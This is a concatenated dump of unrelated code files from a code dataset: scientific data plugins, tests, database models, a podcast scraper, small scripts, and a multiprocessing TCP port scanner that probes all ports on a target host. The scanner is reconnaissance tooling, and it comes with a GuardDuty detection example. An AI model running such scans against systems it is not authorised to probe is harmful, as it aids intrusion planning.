"arguments": {"x": {"from_argument": "data"}}
}
visitor = ProcessGraphVisitor()
visitor.enterProcess = MagicMock()
visitor.enterArgument = MagicMock()
visitor.accept_node(node)
assert visitor.enterProcess.call_args_list == [
call(process_id="cos", arguments={"x": {"from_argument": "data"}}, namespace="math")
]
assert visitor.enterArgument.call_args_list == [call(argument_id="x", value={"from_argument": "data"})]
def test_visit_nodes():
graph = {
"abs": {
"process_id": "abs",
"arguments": {
"data": {
"from_argument": "data"
}
},
},
"cos": {
"process_id": "cos",
"arguments": {
"data": {
"from_node": "abs"
},
"data2": {
"from_parameter": "x"
}
},
"result": True
}
}
visitor = ProcessGraphVisitor()
visitor.leaveProcess = MagicMock()
visitor.enterArgument = MagicMock()
visitor.from_parameter = MagicMock()
visitor.accept_process_graph(graph)
assert visitor.leaveProcess.call_args_list == [
call(process_id="abs", arguments=ANY, namespace=None),
call(process_id="cos", arguments=ANY, namespace=None),
]
assert visitor.enterArgument.call_args_list == [
call(argument_id="data", value=ANY),
call(argument_id="data", value={"from_argument": "data"}),
call(argument_id='data2', value={'from_parameter': 'x'})
]
assert visitor.from_parameter.call_args_list == [
call("x")
]
def test_visit_nodes_array():
graph = {
"abs": {
"arguments": {
"data": [
{"from_argument": "data"},
10.0
]
},
"process_id": "abs"
},
"cos": {
"arguments": {
"data": {
"from_node": "abs"
}
},
"process_id": "cos",
"result": True
}
}
visitor = ProcessGraphVisitor()
visitor.leaveProcess = MagicMock()
visitor.enterArgument = MagicMock()
visitor.enterArray = MagicMock()
visitor.accept_process_graph(graph)
assert visitor.leaveProcess.call_args_list == [
call(process_id='abs', arguments=ANY, namespace=None),
call(process_id='cos', arguments=ANY, namespace=None)
]
assert visitor.enterArgument.call_args_list == [
call(argument_id="data", value=ANY)
]
assert visitor.enterArray.call_args_list == [
call(argument_id="data")
]
def test_visit_array_with_dereferenced_nodes():
graph = {
'arrayelement1': {
'arguments': {'data': {'from_argument': 'data'}, 'index': 2},
'process_id': 'array_element',
'result': False
},
'product1': {
'process_id': 'product',
'arguments': {'data': [{'from_node': 'arrayelement1'}, -1]},
'result': True
}
}
top = ProcessGraphVisitor.dereference_from_node_arguments(graph)
dereferenced = graph[top]
assert dereferenced["arguments"]["data"][0]["arguments"]["data"]["from_argument"] == "data"
visitor = ProcessGraphVisitor()
visitor.leaveProcess = MagicMock()
visitor.enterArgument = MagicMock()
visitor.enterArray = MagicMock()
visitor.arrayElementDone = MagicMock()
visitor.constantArrayElement = MagicMock()
visitor.accept_node(dereferenced)
assert visitor.leaveProcess.call_args_list == [
call(process_id='array_element', arguments=ANY, namespace=None),
call(process_id='product', arguments=ANY, namespace=None)
]
assert visitor.enterArgument.call_args_list == [
call(argument_id="data", value={'from_argument': 'data'})
]
assert visitor.enterArray.call_args_list == [
call(argument_id="data")
]
assert visitor.arrayElementDone.call_args_list == [
call({
"process_id": "array_element",
"arguments": {"data": {"from_argument": "data"}, "index": 2},
"result": False
})
]
assert visitor.constantArrayElement.call_args_list == [
call(-1)
]
def test_dereference_basic():
graph = {
"node1": {},
"node2": {
"arguments": {
"data1": {
"from_node": "node1"
},
"data2": {
"from_node": "node3"
}
},
"result": True
},
"node3": {
"arguments": {
"data": {
"from_node": "node4"
}
}
},
"node4": {}
}
result = ProcessGraphVisitor.dereference_from_node_arguments(graph)
assert result == "node2"
assert graph["node1"] == graph["node2"]["arguments"]["data1"]["node"]
assert graph["node3"] == graph["node2"]["arguments"]["data2"]["node"]
assert graph["node4"] == graph["node3"]["arguments"]["data"]["node"]
assert graph == {
"node1": {},
"node2": {
"arguments": {
"data1": {"from_node": "node1", "node": {}},
"data2": {"from_node": "node3", "node": {
"arguments": {
"data": {"from_node": "node4", "node": {}},
}
}},
},
"result": True
},
"node3": {
"arguments": {
"data": {"from_node": "node4", "node": {}},
}
},
"node4": {}
}
def test_dereference_list_arg():
graph = {
"start": {"process_id": "constant", "arguments": {"x": "2020-02-02"}},
"end": {"process_id": "constant", "arguments": {"x": "2020-03-03"}},
"temporal": {
"process_id": "filter_temporal",
"arguments": {
"extent": [{"from_node": "start"}, {"from_node": "end"}],
},
"result": True,
},
}
result = ProcessGraphVisitor.dereference_from_node_arguments(graph)
assert result == "temporal"
assert graph == {
"start": {"process_id": "constant", "arguments": {"x": "2020-02-02"}},
"end": {"process_id": "constant", "arguments": {"x": "2020-03-03"}},
"temporal": {
"process_id": "filter_temporal",
"arguments": {
"extent": [
{"process_id": "constant", "arguments": {"x": "2020-02-02"}},
{"process_id": "constant", "arguments": {"x": "2020-03-03"}},
],
},
"result": True,
},
}
def test_dereference_dict_arg():
graph = {
"west": {"process_id": "add", "arguments": {"x": 1, "y": 1}},
"east": {"process_id": "add", "arguments": {"x": 2, "y": 3}},
"bbox": {
"process_id": "filter_bbox",
"arguments": {
"extent": {
"west": {"from_node": "west"},
"east": {"from_node": "east"},
}
},
"result": True,
}
}
result = ProcessGraphVisitor.dereference_from_node_arguments(graph)
assert result == "bbox"
assert graph == {
"west": {"process_id": "add", "arguments": {"x": 1, "y": 1}},
"east": {"process_id": "add", "arguments": {"x": 2, "y": 3}},
"bbox": {
"process_id": "filter_bbox",
"arguments": {
"extent": {
"west": {
"from_node": "west",
"node": {"process_id": "add", "arguments": {"x": 1, "y": 1}},
},
"east": {
"from_node": "east",
"node": {"process_id": "add", "arguments": {"x": 2, "y": 3}},
},
}
},
"result": True,
}
}
def test_dereference_no_result_node():
with pytest.raises(ValueError, match="does not contain a result node"):
ProcessGraphVisitor.dereference_from_node_arguments({
"node1": {},
"node2": {}
})
def test_dereference_multiple_result_node():
with pytest.raises(ValueError, match="Multiple result nodes"):
ProcessGraphVisitor.dereference_from_node_arguments({
"node1": {"result": True},
"node2": {"result": True}
})
def test_dereference_invalid_node():
graph = {
"node1": {},
"node2": {
"arguments": {
"data": {
"from_node": "node3"
}
},
"result": True
}
}
with pytest.raises(ValueError, match="not in process graph"):
ProcessGraphVisitor.dereference_from_node_arguments(graph)
def test_dereference_cycle():
graph = {
"node1": {
"arguments": {
"data": {"from_node": "node2"},
},
"result": True
},
"node2": {
"arguments": {
"data": {"from_node": "node1"},
}
}
}
ProcessGraphVisitor.dereference_from_node_arguments(graph)
assert graph["node1"]["arguments"]["data"]["node"] is graph["node2"]
assert graph["node2"]["arguments"]["data"]["node"] is graph["node1"]
| StarcoderdataPython |
11202024 | import strax
import numpy as np
from straxen.common import pax_file, get_resource, get_elife, first_sr1_run
from straxen.itp_map import InterpolatingMap
export, __all__ = strax.exporter()
@export
@strax.takes_config(
strax.Option('trigger_min_area', default=100,
help='Peaks must have more area (PE) than this to '
'cause events'),
strax.Option('trigger_max_competing', default=7,
help='Peaks must have FEWER nearby larger or slightly smaller'
' peaks to cause events'),
strax.Option('left_event_extension', default=int(1e6),
help='Extend events this many ns to the left from each '
'triggering peak'),
strax.Option('right_event_extension', default=int(1e6),
help='Extend events this many ns to the right from each '
'triggering peak'),
)
class Events(strax.OverlapWindowPlugin):
depends_on = ['peak_basics', 'peak_proximity']
data_kind = 'events'
dtype = [
('event_number', np.int64, 'Event number in this dataset'),
('time', np.int64, 'Event start time in ns since the unix epoch'),
('endtime', np.int64, 'Event end time in ns since the unix epoch')]
events_seen = 0
def get_window_size(self):
return (2 * self.config['left_event_extension'] +
self.config['right_event_extension'])
def compute(self, peaks):
le = self.config['left_event_extension']
re = self.config['right_event_extension']
triggers = peaks[
(peaks['area'] > self.config['trigger_min_area'])
& (peaks['n_competing'] <= self.config['trigger_max_competing'])]
# Join nearby triggers
t0, t1 = strax.find_peak_groups(
triggers,
gap_threshold=le + re + 1,
left_extension=le,
right_extension=re)
result = np.zeros(len(t0), self.dtype)
result['time'] = t0
result['endtime'] = t1
result['event_number'] = np.arange(len(result)) + self.events_seen
if not result.size > 0:
print("Found chunk without events?!")
self.events_seen += len(result)
return result
# TODO: someday investigate if/why loopplugin doesn't give
# anything if events do not contain peaks..
# Likely this has been resolved in 6a2cc6c
@export
class EventBasics(strax.LoopPlugin):
__version__ = '0.1.2'
depends_on = ('events',
'peak_basics',
'peak_positions',
'peak_proximity')
def infer_dtype(self):
dtype = [(('Number of peaks in the event',
'n_peaks'), np.int32),
(('Drift time between main S1 and S2 in ns',
'drift_time'), np.int64)]
for i in [1, 2]:
dtype += [
((f'Main S{i} peak index',
f's{i}_index'), np.int32),
((f'Main S{i} time since unix epoch [ns]',
f's{i}_time'), np.int64),
((f'Main S{i} weighted center time since unix epoch [ns]',
f's{i}_center_time'), np.int64),
((f'Alternate S{i} time since unix epoch [ns]',
f'alt_s{i}_time'), np.int64),
((f'Alternate S{i} weighted center time since unix epoch [ns]',
f'alt_s{i}_center_time'), np.int64),
((f'Main S{i} area, uncorrected [PE]',
f's{i}_area'), np.float32),
((f'Main S{i} area fraction top',
f's{i}_area_fraction_top'), np.float32),
((f'Main S{i} width, 50% area [ns]',
f's{i}_range_50p_area'), np.float32),
((f'Main S{i} number of competing peaks',
f's{i}_n_competing'), np.int32),
((f'Area of alternate S{i} in event [PE]',
f'alt_s{i}_area'), np.float32),
((f'Drift time using alternate S{i} [ns]',
f'alt_s{i}_interaction_drift_time'), np.float32)]
dtype += [('x_s2', np.float32,
'Main S2 reconstructed X position, uncorrected [cm]',),
('y_s2', np.float32,
'Main S2 reconstructed Y position, uncorrected [cm]',)]
return dtype
def compute_loop(self, event, peaks):
result = dict(n_peaks=len(peaks))
if not len(peaks):
return result
main_s = dict()
secondary_s = dict()
for s_i in [2, 1]:
s_mask = peaks['type'] == s_i
# For determining the main / alternate S1s,
# remove all peaks after the main S2 (if there was one)
# since these cannot be related to the main S2.
# This is why S2 finding happened first.
if s_i == 1 and result[f's2_index'] != -1:
s_mask &= peaks['time'] < main_s[2]['time']
ss = peaks[s_mask]
s_indices = np.arange(len(peaks))[s_mask]
if not len(ss):
result[f's{s_i}_index'] = -1
continue
main_i = np.argmax(ss['area'])
result[f's{s_i}_index'] = s_indices[main_i]
if ss['n_competing'][main_i] > 0 and len(ss['area']) > 1:
# Find second largest S..
secondary_s[s_i] = x = ss[np.argsort(ss['area'])[-2]]
for prop in ['area', 'time', 'center_time']:
result[f'alt_s{s_i}_{prop}'] = x[prop]
s = main_s[s_i] = ss[main_i]
for prop in ['area', 'area_fraction_top', 'time', 'center_time',
'range_50p_area', 'n_competing']:
result[f's{s_i}_{prop}'] = s[prop]
if s_i == 2:
for q in 'xy':
result[f'{q}_s2'] = s[q]
# Compute a drift time only if we have a valid S1-S2 pairs
if len(main_s) == 2:
result['drift_time'] = \
main_s[2]['center_time'] - main_s[1]['center_time']
if 1 in secondary_s:
result['alt_s1_interaction_drift_time'] = \
main_s[2]['center_time'] - secondary_s[1]['center_time']
if 2 in secondary_s:
result['alt_s2_interaction_drift_time'] = \
secondary_s[2]['center_time'] - main_s[1]['center_time']
return result
@export
@strax.takes_config(
strax.Option(
name='electron_drift_velocity',
help='Vertical electron drift velocity in cm/ns (1e4 m/ms)',
default=1.3325e-4
),
strax.Option(
'fdc_map',
help='3D field distortion correction map path',
default_by_run=[
(0, pax_file('XENON1T_FDC_SR0_data_driven_3d_correction_tf_nn_v0.json.gz')), # noqa
(first_sr1_run, pax_file('XENON1T_FDC_SR1_data_driven_time_dependent_3d_correction_tf_nn_part1_v1.json.gz')), # noqa
(170411_0611, pax_file('XENON1T_FDC_SR1_data_driven_time_dependent_3d_correction_tf_nn_part2_v1.json.gz')), # noqa
(170704_0556, pax_file('XENON1T_FDC_SR1_data_driven_time_dependent_3d_correction_tf_nn_part3_v1.json.gz')), # noqa
(170925_0622, pax_file('XENON1T_FDC_SR1_data_driven_time_dependent_3d_correction_tf_nn_part4_v1.json.gz'))]), # noqa
)
class EventPositions(strax.Plugin):
depends_on = ('event_basics',)
dtype = [
('x', np.float32,
'Interaction x-position, field-distortion corrected (cm)'),
('y', np.float32,
'Interaction y-position, field-distortion corrected (cm)'),
('z', np.float32,
'Interaction z-position, field-distortion corrected (cm)'),
('r', np.float32,
'Interaction radial position, field-distortion corrected (cm)'),
('z_naive', np.float32,
'Interaction z-position using mean drift velocity only (cm)'),
('r_naive', np.float32,
'Interaction r-position using observed S2 positions directly (cm)'),
('r_field_distortion_correction', np.float32,
'Correction added to r_naive for field distortion (cm)'),
('theta', np.float32,
'Interaction angular position (radians)')]
def setup(self):
self.map = InterpolatingMap(
get_resource(self.config['fdc_map'], fmt='binary'))
def compute(self, events):
z_obs = - self.config['electron_drift_velocity'] * events['drift_time']
orig_pos = np.vstack([events['x_s2'], events['y_s2'], z_obs]).T
r_obs = np.linalg.norm(orig_pos[:, :2], axis=1)
delta_r = self.map(orig_pos)
with np.errstate(invalid='ignore', divide='ignore'):
r_cor = r_obs + delta_r
scale = r_cor / r_obs
result = dict(x=orig_pos[:, 0] * scale,
y=orig_pos[:, 1] * scale,
r=r_cor,
z_naive=z_obs,
r_naive=r_obs,
r_field_distortion_correction=delta_r,
theta=np.arctan2(orig_pos[:, 1], orig_pos[:, 0]))
with np.errstate(invalid='ignore'):
z_cor = -(z_obs ** 2 - delta_r ** 2) ** 0.5
invalid = np.abs(z_obs) < np.abs(delta_r) # Why??
z_cor[invalid] = z_obs[invalid]
result['z'] = z_cor
return result
@strax.takes_config(
strax.Option(
's1_relative_lce_map',
help="S1 relative LCE(x,y,z) map",
default_by_run=[
(0, pax_file('XENON1T_s1_xyz_lce_true_kr83m_SR0_pax-680_fdc-3d_v0.json')), # noqa
(first_sr1_run, pax_file('XENON1T_s1_xyz_lce_true_kr83m_SR1_pax-680_fdc-3d_v0.json'))]), # noqa
strax.Option(
's2_relative_lce_map',
help="S2 relative LCE(x, y) map",
default_by_run=[
(0, pax_file('XENON1T_s2_xy_ly_SR0_24Feb2017.json')),
(170118_1327, pax_file('XENON1T_s2_xy_ly_SR1_v2.2.json'))]),
strax.Option(
'elife_file',
default='https://raw.githubusercontent.com/XENONnT/strax_auxiliary_files/master/elife.npy',
help='link to the electron lifetime'))
class CorrectedAreas(strax.Plugin):
depends_on = ['event_basics', 'event_positions']
dtype = [('cs1', np.float32, 'Corrected S1 area (PE)'),
('cs2', np.float32, 'Corrected S2 area (PE)')]
def setup(self):
self.s1_map = InterpolatingMap(
get_resource(self.config['s1_relative_lce_map']))
self.s2_map = InterpolatingMap(
get_resource(self.config['s2_relative_lce_map']))
self.elife = get_elife(self.run_id,self.config['elife_file'])
def compute(self, events):
event_positions = np.vstack([events['x'], events['y'], events['z']]).T
s2_positions = np.vstack([events['x_s2'], events['y_s2']]).T
lifetime_corr = np.exp(
events['drift_time'] / self.elife)
return dict(
cs1=events['s1_area'] / self.s1_map(event_positions),
cs2=events['s2_area'] * lifetime_corr / self.s2_map(s2_positions))
@strax.takes_config(
strax.Option(
'g1',
help="S1 gain in PE / photons produced",
default_by_run=[(0, 0.1442),
(first_sr1_run, 0.1426)]),
strax.Option(
'g2',
help="S2 gain in PE / electrons produced",
default_by_run=[(0, 11.52/(1 - 0.63)),
(first_sr1_run, 11.55/(1 - 0.63))]),
strax.Option(
'lxe_w',
help="LXe work function in quanta/keV",
default=13.7e-3),
)
class EnergyEstimates(strax.Plugin):
__version__ = '0.0.1'
depends_on = ['corrected_areas']
dtype = [
('e_light', np.float32, 'Energy in light signal [keVee]'),
('e_charge', np.float32, 'Energy in charge signal [keVee]'),
('e_ces', np.float32, 'Energy estimate [keVee]')]
def compute(self, events):
el = self.cs1_to_e(events['cs1'])
ec = self.cs2_to_e(events['cs2'])
return dict(e_light=el,
e_charge=ec,
e_ces=el + ec)
def cs1_to_e(self, x):
return self.config['lxe_w'] * x / self.config['g1']
def cs2_to_e(self, x):
return self.config['lxe_w'] * x / self.config['g2']
class EventInfo(strax.MergeOnlyPlugin):
depends_on = ['events',
'event_basics', 'event_positions', 'corrected_areas',
'energy_estimates']
save_when = strax.SaveWhen.ALWAYS
| StarcoderdataPython |
8107745 | from cassandra.cqlengine import columns
from cassandra.cqlengine.models import Model
class SampleCoverage(Model):
__keyspace__ = 'coveragestore'
sample = columns.Text(primary_key=True, partition_key=True)
amplicon = columns.Text(primary_key=True)
run_id = columns.Text(primary_key=True)
library_name = columns.Text(primary_key=True)
program_name = columns.Text(primary_key=True)
num_libraries_in_run = columns.Integer()
sequencer_id = columns.Text()
extraction = columns.Text()
panel = columns.Text()
target_pool = columns.Text()
num_reads = columns.Integer()
mean_coverage = columns.Float()
thresholds = columns.List(columns.Integer)
perc_bp_cov_at_thresholds = columns.Map(columns.Integer, columns.Float)
class AmpliconCoverage(Model):
__keyspace__ = 'coveragestore'
amplicon = columns.Text(primary_key=True, partition_key=True)
sample = columns.Text(primary_key=True)
run_id = columns.Text(primary_key=True)
library_name = columns.Text(primary_key=True)
program_name = columns.Text(primary_key=True)
num_libraries_in_run = columns.Integer()
sequencer_id = columns.Text()
extraction = columns.Text()
panel = columns.Text()
target_pool = columns.Text()
num_reads = columns.Integer()
mean_coverage = columns.Float()
thresholds = columns.List(columns.Integer)
perc_bp_cov_at_thresholds = columns.Map(columns.Integer, columns.Float)
| StarcoderdataPython |
3375805 | """
This script demonstrates the following:
- How to scan a target host for known ports and other port ranges from 0 - 65536
My primary focus while coding this script is LEARN how to program in Python. It is NOT my intention
to cause any harm to 3rd parties (people and/or organizations)
Example:
python port_scanner
Attention:
- This script has only being tested on a Windows development enviroment
- OS = Windows 10 Home Edition (64-bit)
- OS Version = Microsoft Windows [Version 10.0.16299.371]
- Laptop = Dell XPS 15 9550
- RAM = 16GB
- Physical Cores = 4
- Logical Cores = 8
- It takes ~ 18 minutes to scan the ports for a given target host with current environment and
settings
- Increase the max_processes_factor_per_cpu to boost parallelism
Recommendations:
- AWS -> Enable GuardDuty and monitor threat event as the following
[
{
"schemaVersion": "2.0",
"accountId": "",
"region": "us-west-2",
"partition": "aws",
"id": "",
"arn": "",
"type": "Recon:EC2/PortProbeUnprotectedPort",
"resource": {
"resourceType": "Instance",
"instanceDetails": {
"instanceId": "",
"instanceType": "t2.micro",
"launchTime": "2018-04-17T18:55:49Z",
...
}
},
"service": {
"serviceName": "guardduty",
"detectorId": "",
"action": {
"actionType": "PORT_PROBE",
...
"resourceRole": "TARGET",
"additionalInfo": {
"threatName": "Scanner",
"threatListName": "ProofPoint"
},
"eventFirstSeen": "2018-04-17T19:31:08Z",
"eventLastSeen": "2018-04-17T22:07:07Z",
"archived": false,
"count": 14
},
"severity": 2,
"createdAt": "2018-04-17T19:36:20.448Z",
"updatedAt": "2018-04-17T22:17:23.779Z",
"title": "Unprotected port on EC2 instance is being probed.",
"description": "EC2 instance has an unprotected port which is being probed by a known malicious host."
}
]
"""
import multiprocessing
import os
import time
import uuid
from datetime import datetime
from socket import *
from typing import List
def get_max_degree_of_parallelism() -> int:
"""Returns the max degree of parallelism for resource governance purposes
Returns:
The max degree of parallelism.
"""
logical_processor_count = os.cpu_count()
# 1 = 100% of CPUs will be used in a given point in time (1 process per CPU)
# CAUTION: this setting may cause your CPU % to be 100% constantly until:
# a) the dictionaries are created.
# b) dictionary files are scanned to try to find the password.
# 0.5 = 50% of CPUs will be used in a given point in time
# This may be useful to throttle CPU usage
max_processes_factor_per_cpu = 8
max_degree_of_parallelism = round((max_processes_factor_per_cpu * logical_processor_count), 0)
return max_degree_of_parallelism
def start_process_for_range(output_directory: str,
target_host: str,
known_ports: List[int],
target_port_start: int,
target_port_end: int,
running_processes: List[multiprocessing.Process])\
-> multiprocessing.Process:
"""Starts a new process to scan a port range for a given target host
Args:
output_directory: The output directory where opened ports will be written too.
target_host: The target host (e.g. www.google.com)
known_ports: The list of known ports (e.g. 80/HTTP, etc.).
target_port_start: The target port range start number (e.g. 1).
target_port_end: The target port range end number (e.g. 1000).
running_processes: The list of processes currently running.
Returns:
The process that was just created and started.
"""
current_process = multiprocessing.Process(
target=try_connect_range,
args=(output_directory, target_host, known_ports, target_port_start, target_port_end,))
running_processes.append(current_process)
current_process.start()
return current_process
def throttle_process_start(start_time: datetime,
running_processes: List[multiprocessing.Process],
completed_processes: List[multiprocessing.Process],
max_degree_of_parallelism: int):
"""Throttles creating new processes for resource government purposes
Args:
start_time: The overall scan start date/time.
running_processes: The running processes to be throttled.
completed_processes: The processes that completed execution so far.
max_degree_of_parallelism: The max degree of desired parallelism.
"""
is_throttled = False
while len(running_processes) >= max_degree_of_parallelism:
is_throttled = True
for current_process in running_processes:
if not current_process.is_alive():
completed_processes.append(current_process)
running_processes.remove(current_process)
if len(running_processes) < max_degree_of_parallelism:
break
time.sleep(0.1)
# Tracks running time so far if throttling was applied
if is_throttled:
end_time = datetime.now()
print("\n--- Ranges => Completed = {0}; Running = {1}; Partial Elapsed Time = {2} ---"
.format(len(completed_processes), len(running_processes), end_time - start_time))
def try_connect(target_host, target_port):
"""Return a bool indicating whether the connection was successfully established or not.
Args:
target_host (string): The target host to try to connect
target_port (int): The target port to try to connect
Returns:
bool: True if the connection was successfully established to the target host and port.
Otherwise, it returns False
"""
try:
# AF_INET -> Create sockets of the IPv4 address family.
# Used to create connection-oriented sockets, which provide full error detection and
# correction facilities.
with socket(AF_INET, SOCK_STREAM) as soc:
# Sets timeout to 1 second
soc.settimeout(1)
# .connect (()) because address is a tuple
# Connect to a TCP service listening on the Internet address (a 2-tuple (host, port)),
# and return the socket object
soc.connect((target_host, target_port))
print("\n***** Port '{0}' = OPEN *****".format(target_port))
return True
except:
# Exception: timed out.
return False
def try_connect_range(output_directory: str,
target_host: str,
known_ports: List[multiprocessing.Process],
target_port_start: int,
target_port_end: int):
""" Tries to connect to a range of ports one at a time. If connection is successful, an entry
will be added to a file ({UUID}_open_ports.txt) in the output directory
Args:
output_directory: The output directory where opened ports will be written too.
target_host: The target host (e.g. www.google.com)
known_ports: The list of known ports (e.g. 80/HTTP, etc.).
target_port_start: The target port range start number (e.g. 1).
target_port_end: The target port range end number (e.g. 1000).
"""
current_process = multiprocessing.current_process()
random_uuid = uuid.uuid4()
process_open_port_file_name = "{0}_open_ports.txt".format(random_uuid)
process_open_port_file_path = os.path.join(output_directory, process_open_port_file_name)
# Scans target host for high ports
print("\n[PID {0}] Scanning host '{1}' ports from '{2}' to '{3}'"
.format(current_process.pid, target_host, target_port_start, target_port_end))
for target_port in range(target_port_start, target_port_end):
if target_port not in known_ports:
if try_connect(target_host, target_port):
# Write opened ports to an output file named with UUID created above
with open(process_open_port_file_path, "a") as process_open_port_file:
process_open_port_file.write("{0}\n".format(target_port))
def try_get_ipv4(target_host: str) -> object:
"""Returns target host IPv4 address
Args:
target_host (string): The target host to try to resolve the IPv4 address
Returns:
The IPv4 address of the target host, if it is able to resolve it. Otherwise, None.
"""
try:
target_ipv4 = gethostbyname(target_host)
print("Host '{0}' IPv4 is '{1}'".format(target_host, target_ipv4))
return target_ipv4
except Exception as ex:
print("Failed to resolve host '{0}' IPv4 address. Exception: {1}."
.format(target_host, ex))
return None
def scan(output_directory: str,
target_host: str):
"""Scans target host for opened ports using known ports as well as a broader ranges of ports
Returns:
True: The connection was successfully established to the target host and port
False: The connection was not successfully established to the target host and port
"""
if not output_directory or output_directory.isspace():
raise ValueError("Output directory host cannot be none, empty or whitespace.")
if not os.path.exists(output_directory):
raise IOError("Output directory '{0}' was not found.".format(output_directory))
if not target_host or target_host.isspace():
raise ValueError("Target host cannot be none, empty or whitespace.")
start_time = datetime.now()
# Ensures IPv4 can be resolved
target_ipv4 = try_get_ipv4(target_host)
if not target_ipv4 or target_ipv4 == "255.255.255.255":
return
# Scans target host for common ports
print("\n***** Scanning host '{0}' COMMON ports (e.g. FTP, HTTP, etc.) *****"
.format(target_host))
known_ports = [
21, # FTP
23, # Telnet
25, # SMTP
67, # DHCP Client
68, # DHCP Server
80, # HTTP
110, # POP3
135, # RPC
139, # Common Internet File System (CIFS)
143, # IMAP
1433, # MS SQL Server
1521, # Oracle Database Server
1723, # VPN (PPTP)
3306, # MySQL
3389, # RPD (Windows)
]
known_open_port_file_path = os.path.join(output_directory, "known_open_ports.txt")
for target_port in known_ports:
if target_port < 1:
raise ValueError("Target must be greater than 0.")
if try_connect(target_host, target_port):
# Write opened ports to an output file
with open(known_open_port_file_path, "a") as process_open_port_file:
process_open_port_file.write("{0}\n".format(target_port))
# Max degree of parallelism for resource governance purposes
max_degree_of_parallelism = get_max_degree_of_parallelism()
# Scans target host for high ports
print("\n***** Scanning host '{0}' OTHER port ranges (Max Degree of Parallelism = {1}) *****"
.format(target_host, max_degree_of_parallelism))
# List of processes that will run to scan different port ranges
running_processes = []
completed_processes = []
target_port_start = 1
max_port_number = 65536 # (Exclusive)
range_step = 100
for target_port_end in range(range_step, max_port_number, range_step):
start_process_for_range(output_directory, target_host, known_ports, target_port_start,
target_port_end, running_processes)
target_port_start = target_port_end
throttle_process_start(start_time, running_processes, completed_processes,
max_degree_of_parallelism)
# Run the remaining port range
start_process_for_range(output_directory, target_host, known_ports, target_port_start,
target_port_end, running_processes)
for process in running_processes:
process.join()
end_time = datetime.now()
print("\n***** Completed scanning (Elapsed Time => {0}) *****".format(end_time - start_time))
| StarcoderdataPython |
1696107 | """A package for computing overall grades in courses @ UCSD."""
from .io import (
read_egrades_roster,
read_canvas,
read_gradescope,
write_canvas_grades,
write_egrades,
)
from .gradebook import Gradebook, Assignments
from .scales import (
DEFAULT_SCALE,
ROUNDED_DEFAULT_SCALE,
map_scores_to_letter_grades,
average_gpa,
letter_grade_distribution,
plot_grade_distribution,
find_robust_scale,
)
| StarcoderdataPython |
9603050 | import sys
def printing(count,num):
print(num," *",count," =",num*count)
def main():
num=sys.argv[1]
num=int(num)
til=int(sys.argv[2])
count=1
while(count<=til):
printing(count,num)
count=count+1
#main starts from here
main()
| StarcoderdataPython |
4841285 | <gh_stars>1-10
'''Definición de esquemas de JSON.'''
esquema_alumno = {
"$schema": "http://json-schema.org/draft-07/schema#",
"type": "object",
"properties": {
"Nombre": {"type": "string",
"minLength":1,
},
"Primer Apellido": {"type": "string",
"minLength":1,},
"Segundo Apellido": {"type": "string",
"minLength":1,},
"Carrera": {"type": "string"},
"Semestre": {"type": "number",
"minimum": 1,
"maximum": 50,},
"Promedio": {"type": "number",
"minimum": 0,
"maximum": 10,},
"Al Corriente": {"type": "boolean"},
},
"required": ["Nombre", "Primer Apellido", "Carrera", "Semestre",
"Promedio", "Al Corriente"]
} | StarcoderdataPython |
181224 | <gh_stars>1-10
"""Data structures to represent server information."""
from ark_rcon.datastructures.players import Players
from ark_rcon.datastructures.logline import LogLine
__all__ = ['Players', 'LogLine']
| StarcoderdataPython |
70239 | <filename>2021/07.py
from statistics import mean, median
import math
with open("input.txt") as fin:
positions = [int(i) for i in fin.read().split(",")]
def p1():
m = median(positions)
return sum(abs(m - x) for x in positions)
def p2():
m = mean(positions)
res = float("inf")
for m in range(math.floor(m) - 1, math.floor(m) + 1):
res = min(res, sum(abs(m - x) / 2 * (abs(m - x) + 1) for x in positions))
return res
print(p2())
| StarcoderdataPython |
8093325 | <reponame>mkazmier/torchmtlr
import pytest
import torch
import numpy as np
from torchmtlr.utils import encode_survival, make_time_bins
bins = torch.arange(1, 5, dtype=torch.float)
testdata = [
(3., 1, torch.tensor([0, 0, 0, 1, 0]), bins),
(2., 0, torch.tensor([0, 0, 1, 1, 1]), bins),
(0., 1, torch.tensor([1, 0, 0, 0, 0]), bins),
(6., 1, torch.tensor([0, 0, 0, 0, 1]), bins),
(2., False, torch.tensor([0, 0, 1, 1, 1]), bins),
(torch.tensor([3., 2.]), torch.tensor([1, 0]),
torch.tensor([[0, 0, 0, 1, 0], [0, 0, 1, 1, 1]]), bins),
(np.array([3., 2.]), np.array([1, 0]),
torch.tensor([[0, 0, 0, 1, 0], [0, 0, 1, 1, 1]]), bins.numpy())
]
@pytest.mark.parametrize("time,event,expected,bins", testdata)
def test_encode_survival(time, event, expected, bins):
encoded = encode_survival(time, event, bins)
assert torch.all(encoded == expected)
# testdata = [
# ]
# @pytest.mark.parametrize("times,num_bins,use_quantiles,event,expected", testdata)
# def test_make_time_bins(times, num_bins, use_quantiles, event, expected):
# bins = make_time_bins(times, num_bins, use_quantiles, event)
# assert torch.allclose(bins, expected)
| StarcoderdataPython |
3303610 | """This module purse VOH website to get the contents for podcast feed.
"""
import collections
from urllib.parse import urljoin, urlparse, urlunparse
import datetime
import re
import pytz
import requests
from bs4 import BeautifulSoup
from podcasts_utils import get_true_url
def get_articles_from_html(soup, url, no_items, podcast_title, item_titles=None):
"""
Takes an HTML string and extracts children according to
Returns a set of namedtuples with link, title and description
"""
feed_article = collections.namedtuple(
'feed_article', {
'link', 'title', 'description', 'pub_date', 'media', 'type'})
articles = list()
# debug = False
count = 0
items = soup.select('div.wrapper-item-large')
for i in items:
count = count + 1
if count > no_items:
break
item = i.select_one('h3.title-article')
link = urljoin(url, item.a.get('href'))
title = item.text.strip()
description = i.select_one('p.time').text.strip()
time_regex = r'(\d+):(\d+) - (\d+)/(\d+)/(\d+)'
match = re.search(time_regex, description, re.M | re.I)
vt_tz = pytz.timezone('Asia/Ho_Chi_Minh')
year, month, day, hour, minute = int(match.group(5)), int(match.group(4)), int(
match.group(3)), int(match.group(1)), int(match.group(2))
pub_date = datetime.datetime(
year, month, day, hour, minute).astimezone(vt_tz)
print(link, title, pub_date)
if item_titles != None:
item_titles.append(title)
spage = requests.get(link)
ssoup = BeautifulSoup(spage.content, 'html.parser')
# print(spage.content)
rmedia = ssoup.select_one('source')['src']
mime = ssoup.select_one('source')['type']
parsed = urlparse(url)
home = urlunparse((parsed[0], parsed[1], '', '', '', ''))
media = rmedia
# # print(media)
true_url = get_true_url(media) # Get length of media file
articles.append(
feed_article(
link=link,
title=title,
description=description,
pub_date=pub_date,
media=true_url,
type=mime))
return articles
| StarcoderdataPython |
4879504 | <gh_stars>1-10
import os, zipfile, random, string
